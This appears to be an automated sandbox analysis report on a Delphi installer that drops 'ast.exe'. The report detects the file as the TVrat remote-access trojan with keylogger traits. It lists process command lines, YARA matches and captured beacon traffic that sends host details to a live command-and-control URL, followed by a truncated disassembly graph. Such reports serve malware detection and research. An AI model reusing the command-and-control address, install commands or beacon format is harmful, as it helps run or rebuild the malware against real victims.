                                                                                                                                2024-11-19 17:57:02 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.450175212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:03 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:03 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                50192.168.2.450178212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:04 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:04 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                51192.168.2.450181212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:05 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:05 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                52192.168.2.450184212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:06 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                53192.168.2.450187212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:08 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:08 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                54192.168.2.450190212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:57:12 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:57:12 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.
                                                                                                                                2024-11-19 17:57:12 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:12:55:01
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\wjpP1EOX0L.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5 hash:34DC961FE0A98EA779D7B673A48C77A0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:1
                                                                                                                                Start time:12:55:01
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'179'648 bytes
                                                                                                                                MD5 hash:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:12:55:02
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\wjpP1EOX0L.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5 hash:34DC961FE0A98EA779D7B673A48C77A0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:12:55:02
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:1'179'648 bytes
                                                                                                                                MD5 hash:90FC739C83CD19766ACB562C66A7D0E2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:8
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:9
                                                                                                                                Start time:12:55:38
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"
                                                                                                                                Imagebase:0xf60000
                                                                                                                                File size:43'520 bytes
                                                                                                                                MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:12:56:09
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\im\ast.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:7'543'992 bytes
                                                                                                                                MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\im\ast.exe, Author: Joe Security
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:11
                                                                                                                                Start time:12:56:19
                                                                                                                                Start date:19/11/2024
                                                                                                                                Path:C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\im\ast.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:7'543'992 bytes
                                                                                                                                MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:5.4%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:14.9%
                                                                                                                                  Total number of Nodes:1299
                                                                                                                                  Total number of Limit Nodes:116
                                                                                                                                  execution_graph 26385 6b92f692 GetLastError 26386 6b92f6af 26385->26386 26387 6b92f6a9 26385->26387 26407 6b92f6b5 SetLastError 26386->26407 26408 6b92fb8f 26386->26408 26420 6b92fb50 6 API calls __dosmaperr 26387->26420 26394 6b92f6e5 26396 6b92fb8f __dosmaperr 6 API calls 26394->26396 26395 6b92f6fc 26397 6b92fb8f __dosmaperr 6 API calls 26395->26397 26398 6b92f6f3 26396->26398 26399 6b92f708 26397->26399 26421 6b92f7ea 26398->26421 26400 6b92f70c 26399->26400 26401 6b92f71d 26399->26401 26402 6b92fb8f __dosmaperr 6 API calls 26400->26402 26427 6b92f33d 14 API calls __dosmaperr 26401->26427 26402->26398 26405 6b92f728 26406 6b92f7ea _free 12 API calls 26405->26406 26406->26407 26428 6b92f953 26408->26428 26411 6b92f6cd 26411->26407 26413 6b92f78d 26411->26413 26412 6b92fbc9 TlsSetValue 26418 6b92f79a __dosmaperr 26413->26418 26414 6b92f7da 26437 6b921f49 14 API calls __dosmaperr 26414->26437 26415 6b92f7c5 RtlAllocateHeap 26416 6b92f6dd 26415->26416 26415->26418 26416->26394 26416->26395 26418->26414 26418->26415 26436 6b9348a6 EnterCriticalSection LeaveCriticalSection __dosmaperr 26418->26436 26420->26386 26422 6b92f7f5 RtlFreeHeap 26421->26422 26426 6b92f81e __dosmaperr 26421->26426 26423 6b92f80a 26422->26423 26422->26426 26438 6b921f49 14 API calls __dosmaperr 26423->26438 26425 6b92f810 GetLastError 26425->26426 26426->26407 26427->26405 26429 6b92f981 26428->26429 26430 6b92f97d 26428->26430 26429->26430 26435 6b92f88c LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary try_get_first_available_module 26429->26435 26430->26411 26430->26412 26432 6b92f995 26432->26430 26433 6b92f99b GetProcAddress 26432->26433 26433->26430 26434 6b92f9ab __crt_fast_encode_pointer 26433->26434 26434->26430 26435->26432 26436->26418 26437->26416 26438->26425 27875 6b912290 27 API calls 4 library calls 27876 6b92ce9a 25 API calls __fassign 26439 6b8d9f80 26440 6b8d9f90 26439->26440 26441 6b8d9f97 26440->26441 26444 6b8da230 26440->26444 26443 6b8d9faf 26445 6b8da23b 26444->26445 26446 6b8da241 26444->26446 26445->26443 26447 6b8da24a 26446->26447 26451 6b8da260 26446->26451 26454 6b9005d0 74 API calls __fassign 26447->26454 26449 6b8da255 26449->26443 26450 6b8da28c 26450->26443 26451->26450 26455 6b9005d0 74 API calls __fassign 26451->26455 26453 6b8da281 26453->26443 26454->26449 26455->26453 26456 6b8da080 26457 6b8da097 26456->26457 26458 6b8da09e 26457->26458 26459 6b8da230 74 API calls 26457->26459 26460 6b8da0b6 26459->26460 27877 6b8d7e80 11 API calls 27878 6b8dde80 206 API calls 2 library calls 27879 6b8e8a80 185 API calls 3 library calls 27880 6b8e7e80 84 API calls 2 library calls 26560 6b8f7e80 26563 6b8f6ef0 26560->26563 26562 6b8f7e9b 26564 6b8f747b 26563->26564 26565 6b8f6f24 26563->26565 26566 6b91db71 __fassign 5 API calls 26564->26566 26565->26564 26567 6b8f6f30 26565->26567 26570 6b8f748c 26566->26570 26568 6b8f6f4b 26567->26568 26569 6b8f6f38 26567->26569 26572 6b8f6f53 26568->26572 26577 6b8f6f69 26568->26577 26571 6b91db71 __fassign 5 API calls 26569->26571 26570->26562 26573 6b8f6f47 26571->26573 26574 6b91db71 __fassign 5 API calls 26572->26574 26573->26562 26576 6b8f6f65 26574->26576 26576->26562 26607 6b8f9c30 26577->26607 26578 6b8f720e WSAWaitForMultipleEvents 26586 6b8f722e 26578->26586 26588 6b8f72eb 26578->26588 26579 6b8f7231 WSAEnumNetworkEvents 26582 6b8f72c2 WSAEventSelect 26579->26582 26579->26586 26580 6b8f7452 26583 6b91db71 __fassign 5 API calls 26580->26583 26581 6b8f73ed WSAResetEvent 26584 6b8f73fc 26581->26584 26582->26579 26582->26588 26587 6b8f7461 26583->26587 26584->26580 26593 6b8f9c30 7 API calls 26584->26593 26586->26579 26586->26582 26587->26562 26588->26581 26597 6b8f7337 WSAEnumNetworkEvents 26588->26597 26599 6b8f73ea 26588->26599 26603 6b8f73b6 WSAEventSelect 26588->26603 26606 6b9003a0 16 API calls 26588->26606 26589 6b9003a0 16 API calls 26590 6b8f6fd6 26589->26590 26590->26589 26592 6b8f70ab WSAEventSelect 26590->26592 26601 6b8f70e1 26590->26601 26591 6b8f71cb WSAEventSelect 26594 6b8f7465 26591->26594 26591->26601 26592->26590 26592->26594 26595 6b8f742f 26593->26595 26598 6b91db71 __fassign 5 API calls 26594->26598 26595->26580 26602 6b8f7441 26595->26602 26596 6b8f71fa 26596->26578 26596->26584 26597->26588 26600 6b8f7477 26598->26600 26599->26581 26600->26562 26601->26591 26601->26596 26614 6b8ffef0 26601->26614 26647 6b9004d0 WSASetLastError Sleep 26602->26647 26603->26588 26605 6b8f744f 26605->26580 26606->26588 26608 6b8f9c49 26607->26608 26609 6b8f9d12 26607->26609 26610 6b90e5d0 2 API calls 26608->26610 26609->26590 26611 6b8f9c52 26610->26611 26648 6b909340 5 API calls __fassign 26611->26648 26613 6b8f9c77 26613->26590 26615 6b8fff10 26614->26615 26620 6b8fff2b 26614->26620 26615->26620 26632 6b8fff69 26615->26632 26616 6b900384 26618 6b91db71 __fassign 5 API calls 26616->26618 26617 6b900369 26621 6b90037d Sleep 26617->26621 26622 6b900390 26618->26622 26619 6b8fff4d WSASetLastError 26624 6b91db71 __fassign 5 API calls 26619->26624 26620->26616 26620->26617 26620->26619 26623 6b900363 26620->26623 26621->26616 26622->26601 26623->26617 26623->26621 26625 6b8fff65 26624->26625 26625->26601 26626 6b9000d9 26635 6b9000e9 26626->26635 26640 6b900164 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 26626->26640 26627 6b900100 WSASetLastError 26628 6b90010e 26627->26628 26629 6b91db71 __fassign 5 API calls 26628->26629 26630 6b90011b 26629->26630 26630->26601 26631 6b900237 select 26633 6b9000fb 26631->26633 26632->26626 26632->26627 26633->26628 26646 6b90027f 26633->26646 26634 6b900142 26637 6b900156 Sleep 26634->26637 26635->26633 26635->26634 26636 6b900129 WSASetLastError 26635->26636 26638 6b90013c 26635->26638 26636->26633 26637->26633 26638->26634 26638->26637 26639 6b9002a1 __WSAFDIsSet 26642 6b9002df __WSAFDIsSet 26639->26642 26639->26646 26640->26631 26641 6b900350 26643 6b91db71 __fassign 5 API calls 26641->26643 26644 6b9002fc __WSAFDIsSet 26642->26644 26642->26646 26645 6b90035f 26643->26645 26644->26646 26645->26601 26646->26639 26646->26641 26646->26642 26646->26644 26647->26605 26648->26613 27881 6b8fca80 7 API calls __fassign 27884 6b8f3980 curl_slist_free_all 27885 6b8da190 31 API calls 27886 6b8d9190 79 API calls ___from_strstr_to_strchr 27887 6b8d9890 101 API calls ___scrt_fastfail 27129 6b91e78f 27130 6b91e798 27129->27130 27131 6b91e79d dllmain_dispatch 27129->27131 27133 6b91e7ff GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 27130->27133 27133->27131 27757 6b8f7990 27758 6b8f79b4 27757->27758 27762 6b8f799f 27757->27762 27759 6b8f7a25 27766 6b8d1e00 27759->27766 27762->27758 27762->27759 27774 6b8f83d0 27762->27774 27763 6b8f7a2f 27764 6b8f7a5d WSACloseEvent 27763->27764 27765 6b8f7a73 27764->27765 27767 6b8d1fcc 27766->27767 27773 6b8d1e2b 27766->27773 27768 6b91db71 __fassign 5 API calls 27767->27768 27769 6b8d1fda 27768->27769 27769->27763 27770 6b8d1f9d 27770->27767 27771 6b8e1650 106 API calls 27770->27771 27771->27767 27772 6b8e1bd0 83 API calls 27772->27773 27773->27770 27773->27772 27775 6b8f83ff 27774->27775 27776 